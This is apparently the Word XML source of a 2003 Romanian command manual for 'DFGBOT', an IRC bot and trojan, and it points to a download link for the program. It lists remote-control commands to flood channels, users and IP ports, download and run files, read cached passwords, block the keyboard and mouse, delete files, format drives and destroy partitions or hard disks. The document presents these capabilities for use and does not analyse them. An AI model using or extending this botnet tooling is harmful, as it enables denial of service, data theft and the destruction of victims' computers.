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cs="Courier New"/>
          <w:shadow/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:shadow/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>www.DFG2003.home.ro/</w:t>
      </w:r>
      <w:hyperlink r:id="rId2">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:cs="Courier New"/>
            <w:shadow/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>dfgbot</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:shadow/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.zip</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:autoSpaceDE w:val="false"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:shadow/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:effect w:val="blinkBackground"/>
        </w:rPr>
        <w:t xml:space="preserve">DFGBOT </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:autoSpaceDE w:val="false"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Courier New"/>
          <w:shadow/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:shadow/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Comenzi publice valabile pana la ver 8.x</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:autoSpaceDE w:val="false"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:shadow/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shadow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caps/>
          <w:shadow/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:effect w:val="blinkBackground"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:caps/>
          <w:shadow/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:effect w:val="blinkBackground"/>
        </w:rPr>
        <w:t>Comenzi pe canal:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:autoSpaceDE w:val="false"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:b/>
          <w:caps/>
          <w:shadow/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:effect w:val="blinkBackground"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:caps/>
          <w:shadow/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:effect w:val="blinkBackground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REPORT &lt;ver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NOREPORT &lt;ver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STARTAUTOFLOO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STOPAUTOFLOO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STARTFLOODTIM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STARTFLOODTIME &lt;chan&gt; &lt;time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MONITOROFF &lt;ver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MONITORON &lt;ver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SSOFF &lt;ver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SSON &lt;ver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VISIT &lt;site ver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PCSPEAKEROFF &lt;ver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PCSPEAKERON &lt;ver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BLOCK &lt;time ver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SHOWTRAY &lt;ver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HIDETRAY &lt;ver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SHOWDESKTOP &lt;ver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HIDEDESKTOP &lt;ver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GETHDDSN &lt;ver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USERNAME &lt;ver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TIMEZONE &lt;ver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GETLANG &lt;ver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PFPATH &lt;ver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MACADRESS &lt;ver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DEFAULTBROWSER &lt;ver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COMPUTERNAME &lt;ver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MOUSEBUTTONS &lt;ver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GETCDROMDRIVE &lt;ver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WIPE &lt;file ver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ISWORD &lt;ver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ISWINSOCK &lt;ver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ISINTERNETEXPLORER &lt;ver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ISACTIVEDESKTOP &lt;ver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CPUBEEP &lt;ver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RESETMASTER &lt;ver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GETMASTER &lt;ver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CTCP &lt;nick msg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DCC &lt;nick file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LISTCHANNELS &lt;ver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STARTFLOODKOOLLONG &lt;canal&gt; - Flood cu join si part la fiecare 5 minut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STOPFLOODKOOLLONG &lt;canal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ONLYDFG &lt;ver&gt; - No Comm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REZOLUTIE &lt;ver&gt; - Rezoluti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WININFO &lt;ver&gt; - Informatii din Window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STARTPAGE &lt;ver&gt; - Pagina de star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CPUFR &lt;ver&gt; - Frecventa procesorului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PASS &lt;ver&gt; - Parolele din cac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STOPTELEPHONE – Inchide dialer.ex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TELEPHONE &lt;number&gt; Telefoneaz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SETSTARTPAGE &lt;page&gt; - Seteaza pagina de star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KILL &lt;exename&gt; Inchide aplicati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CLIPBOARD &lt;ver&gt; - Afiseaza clipboardu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DATE &lt;ver&gt; - Data setata pe calculato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KEYBOARDON &lt;ver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KEYBOARDOFF &lt;ver&gt; - Dezactiveaza tastatur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WARMODEOFF &lt;ver&gt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|WARMODEON &lt;ver&gt; - Nu mai da reply la ping si ctcp, ignora mesaje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CLONE &lt;ver&gt; - Mai ruleaza inca odata botu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STARTFLOODKOOL &lt;victim&gt; – Flood join si part de 15 ori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STARTFLOODCOMBO &lt;victim&gt; – Flood cu join I part si pingme!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STARTFLOODNICK &lt;victim&gt; – Flood pe nick mesaje si DCC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STARTFLOODDO1..5 &lt;victim&gt; – Flood configurabi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STARTFLOODPORT &lt;IP port&gt; - Flood pe IP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|RESETCFG – Sterge dfgbot.ini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KEY &lt;key&gt; - Seteaza cheia de cana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NOKEY – Reseteaza chei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SAYVERSION – Spune versiune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PARTMSG &lt;msg&gt; – Seteaza mesajul de par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SITE &lt;site&gt; – Afiseaza site-u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DEFAULTFLOODMSG – Reseteaza mesajul de floo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FLOODMSG &lt;msg&gt; - Seteaza mesajul de floo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DELETE &lt;filename&gt;– Sterge fisier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|GET&amp;RUN1 &lt;link&gt; - downloadeaza si ruleaz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GET&amp;RUN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GET&amp;RUN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GET&amp;RUN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GET&amp;RUN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UNINSTALL &lt;ver&gt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FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>|UPGRADECFG &lt;versiune&gt; &lt;ALL&gt; – upgrade de pe net configurar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FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>|UPGRADEBOT &lt;versiune&gt; &lt;ALL&gt; – upgrade Bot, instaleaza versiunea noua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  <w:t>|RESURECTION &lt;versiune&gt; – activeaza noua versiune si noile setari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QUIT - deconect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NICK &lt;nick&gt;- schimba nick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OP &lt;nick&gt;- da op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DOP &lt;nick&gt; - de op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K &lt;nick&gt; - kick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SAY2NICK &lt;nick&gt; - mesaj pe nick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PART &lt;#canal&gt; - part de pe un cana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JOIN &lt;#canal&gt; - join pe cana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SAY &lt;mesaj&gt; - mesaj pe cana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VER - versiune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DO &lt;mesaj&gt; - comanda direct pe IRC protoco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STATUS - informatii statu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TOPIC &lt;topic&gt; - seteaza topic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STO &lt;nick&gt; - kick la 10 secunde pe nick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PARTALL - iese de pe toate canale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STARTFLOOD &lt;#canal&gt; - floodeaza canalul specifica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STOPFLOOD &lt;#canal&gt; - opreste floodu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INVITE - seteaza invite ON/OFF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  <w:t>|SAVEH1 - salveaza host 1 de la care asculta comenzi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  <w:t>|SAVEH2 - salveaza host 2 de la care asculta comenzi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  <w:t>|SAVEH3 - salveaza host 3 de la care asculta comenzi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  <w:t>|SAVEH4 - salveaza host 4 de la care asculta comenzi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  <w:t>|SAVEH5 - salveaza host 5 de la care asculta comenzi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  <w:t>|SAVEH6 - salveaza host 6 de la care asculta comenzi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  <w:t>|SAVEH7 - salveaza host 7 de la care asculta comenzi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  <w:t>|SAVEH8 - salveaza host 8 de la care asculta comenzi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  <w:t>|SAVEH9 - salveaza host 9 de la care asculta comenzi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  <w:t xml:space="preserve">|SAVEF1 – salveaza friend 1 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  <w:t>|SAVEINVITE - salveaza invite ON/OFF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  <w:t>|SETCANAL1 - seteaza canalul 1 pe care intra automat la conectare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  <w:t>|SETCANAL2 - seteaza canalul 2 pe care intra automat la conectare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  <w:t>|SETCANAL3 - seteaza canalul 3 pe care intra automat la conectare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  <w:t>|SETCANAL4 - seteaza canalul 4 pe care intra automat la conectare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  <w:t>|SETCANAL5 - seteaza canalul 5 pe care intra automat la conectare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  <w:t>|SETCANAL6 - seteaza canalul 6 pe care intra automat la conectare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  <w:t>|SETCANAL7 - seteaza canalul 7 pe care intra automat la conectare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  <w:t>|SETCANAL8 - seteaza canalul 8 pe care intra automat la conectare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  <w:t>|SETCANAL9 - seteaza canalul 9 pe care intra automat la conectare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  <w:t>|SETCANAL10 - seteaza canalul 10 pe care intra automat la conectar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FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>|SERVER &lt;server&gt; - seteaza serverul pe care intra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caps/>
          <w:shadow/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:effect w:val="blinkBackground"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:caps/>
          <w:shadow/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:effect w:val="blinkBackground"/>
        </w:rPr>
        <w:t>Comenzi in privat:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:autoSpaceDE w:val="false"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:b/>
          <w:caps/>
          <w:shadow/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:effect w:val="blinkBackground"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:caps/>
          <w:shadow/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:effect w:val="blinkBackground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u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Comenzi simple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parola - autentific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DFG|=autodistruge-t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DFG|=self-kil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DFG|=spune-versiune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DFG|=distruge-partitia-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DFG|=saboteaza-sistemu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DFG|=arata-blue-screen-of-deat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DFG|=desktop-fu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DFG|=curata-CMO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DFG|=dezactiveaza-tastatur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DFG|=repara-tastatur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DFG|=intoarce-ecranu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DFG|=suspenda-pc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DFG|=opreste-monitoru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DFG|=dezactiveaza-mouseu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DFG|=schimba-butoane-mou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DFG|=refacere-butoane-mou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DFG|=nebunie-mou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DFG|=activeaza-caps-lock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DFG|=mananca-desktop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DFG|=distruge-harddisk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DFG|=schimba-nick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DFG|=reintra-pe-cana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u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Comenzi IRC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nick &lt;nick&gt; - schimba nick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join &lt;#canal&gt; - intra pe cana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part &lt;#canal&gt; - iese de pe cana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remuser &lt;user&gt; - sterge useru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support - suppor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mode+x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mode+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mode-x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mode-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newpass &lt;parola&gt; - schimba parola la use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suspendm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X@C - comanda la X@Channels.undernet.org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setnick &lt;nick&gt; - seteaza nick cur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setchan &lt;#canal&gt; - seteaza canal cur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msgnick &lt;mesaj&gt; - trimite mesaj la nick curent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msgchan &lt;mesaj&gt; - trimite mesaj pe canal curr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uninstall &lt;ver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setlognick - seteaza nickul pe care logheaza ce primeste in priva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showtempas - arata parola temporar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deltempas - sterge parola temporar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atac &lt;nick&gt; - atac pe nick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atak &lt;#canal&gt; - atac pe cana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setlogchan - seteaza nickul pe care logheaza ce primeste pe cana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kick &lt;nick&gt;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|seth1 - seteaza host 1 de la care primeste comenz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|seth2 - seteaza host 2 de la care primeste comenz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|seth3 - seteaza host 3 de la care primeste comenz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|seth4 - seteaza host 4 de la care primeste comenz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|seth5 - seteaza host 5 de la care primeste comenz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|seth6 - seteaza host 6 de la care primeste comenz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|seth7 - seteaza host 7 de la care primeste comenz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|seth8 - seteaza host 8 de la care primeste comenz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|seth9 - seteaza host 9 de la care primeste comenzi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opop &lt;nick&gt; - op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deop &lt;nick&gt; - de op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banf &lt;formaban&gt; - forma b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banb &lt;nick&gt; - b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voic &lt;nick&gt; - voic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devo &lt;nick&gt; - devoic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topic &lt;topic&gt; - seteaza topic pe canalul cur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Xmsg &lt;mesaj&gt; - mesaj la X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modeX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mode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setbc1 - seteaza bad channel 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setbc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setbc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setbc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setbc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setbc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setbc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setbc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setbc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setbn1 - seteaza bad nick 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setbn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setbn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setbn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setbn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setbn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setbn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setbn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setbn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invite - invite daca on face off daca nu inver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setfri1 &lt;nick&gt; - seteaza nick de la care accepta comenzi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setfri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setfri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setfri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setfri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u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Comenzi setari bot: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  <w:t>|setserver - seteaza server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  <w:t>|setpass - seteaza parola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  <w:t>|setnick - seteaza nick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  <w:t>|setuser - seteaza user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  <w:t>|setport - seteaza port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  <w:t>|setname - seteaza nume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  <w:t>|setvere - seteaza mesaj CTCP version reply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  <w:t>|setpingr - seteaza ping reply ON/OFF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  <w:t>|setctcpr - seteaza CTCP reply ON/OFF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  <w:t>|setintro - seteaza intro pe canal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  <w:t>|setcanal1 - seteaza canal 1 pe care intra la conectare automat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  <w:t>|setcanal2 - seteaza canal 2 pe care intra la conectare automat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  <w:t>|setcanal3 - seteaza canal 3 pe care intra la conectare automat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  <w:t>|setcanal4 - seteaza canal 4 pe care intra la conectare automat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  <w:t>|setcanal5 - seteaza canal 5 pe care intra la conectare automat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  <w:t>|setcanal6 - seteaza canal 6 pe care intra la conectare automat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  <w:t>|setcanal7 - seteaza canal 7 pe care intra la conectare automat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  <w:t>|setcanal8 - seteaza canal 8 pe care intra la conectare automat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  <w:t>|setcanal9 - seteaza canal 9 pe care intra la conectare automat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  <w:t>|setcanal10 - seteaza canal 10 pe care intra la conectare automat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  <w:t>|saveinvite - salveaza invite ON/OFF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  <w:t>|saveh1 - salveaza hosturi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  <w:t>|saveh2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  <w:t>|saveh3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  <w:t>|saveh4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  <w:t>|saveh5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  <w:t>|saveh6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  <w:t>|saveh7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  <w:t>|saveh8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  <w:t>|saveh9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  <w:t>|seruser - set random user ON/OFF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  <w:t>|sername - set random name ON/OFF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  <w:t>|sernick - set random nick ON/OFF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  <w:t>|upgradecfg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  <w:t>|upgradebot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  <w:t>|resurect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|get&amp;run1 &lt;url&gt; – downloadeaza si ruleaza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|get&amp;run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|get&amp;run3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u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Comenzi troian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info – informatii calculato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date – data local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clip – afiseaza clipboar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kill &lt;aplicatie.exe&gt; – inchide aplicati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pass – afiseaza parolele din cac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task1 – afiseaza toate procesele rulat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task0 – afiseaza procesele rulate dar nu pe cele ascun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mousesw – mouse swep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mouseus – restaurare mou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standb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autorun – Cd autoinsert notificatio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setaron - seteaza autoinsert O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setaroff - seteaza autoinsert OF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drop – lanseaza troian Unirea RAT dar nu este implementat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blkmou – blocheaza mou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blkkey – blocheaza tastatur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ascdk – ascunde desktop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exelist – lista executabilelor care ruleaz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aradk – arata desktop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gettime – citeste timpu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cpufr – frecventa procesorului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stpag – pagina de start in I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insapp – aplicatiile instalat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wininfo – informatii despre Window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fordrv – formateaza driv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getip – afiseaza IP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getdrv – info driv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default – setarile initia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taskbarp – pozitia taskba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wallm – pune wallpape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blkimp – blocheaza input-urile [tst si mouse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rlsimp - deblocheaz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powerof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rezol – afiseaza rezoluti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setoem – OEM log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dist – dezactiveaza taskbar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enat – activeaza taskba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run – ruleaza fise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restartpc – reporneste calculato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delfile – sterge fisie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hide &lt;handle&gt; - ascunde fereastr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disw – dezactiveaza fereastr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setlk – seteaza keyboard languag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mesaj – trimite mesaj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clmes – curata toate mesajele trimi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ascdial – ascunde Telefon Diale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ascfer – ascunde fereastr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setspag – seteaza pagina de start IE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="123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check – verifica daca ruleaza fisie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setsfi2 – fisier sursa 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setdfi2 – fisier destinatie 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read - citest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isfile – verifica daca e fisieru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getfi2 – downloadeaza metoda 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setsfi1 – fisier sursa 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setdfi1 – fisier destinatie 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getfi1 – downloadeaza metoda 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telef - telefoneaz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stopt – opreste telefo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quecom – query comand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delete - sterg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wallp - wallpape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setsf  - fisier sursa de copia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setdf – fisier destinatie de copia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copyfile – copiaza fisie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enaw – activeaza fereastr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show – arata fereastra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shadow/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:shadow/>
        </w:rPr>
        <w:t>DFG2004</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="right"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Embrace The Inevitable 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FG2003.home.ro/dfgbot.ex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30T18:03:00Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2003-05-09T18:25:00Z</dcterms:modified>
  <cp:revision>63</cp:revision>
  <dc:subject/>
  <dc:title>DFGBOT</dc:title>
</cp:coreProperties>
</file>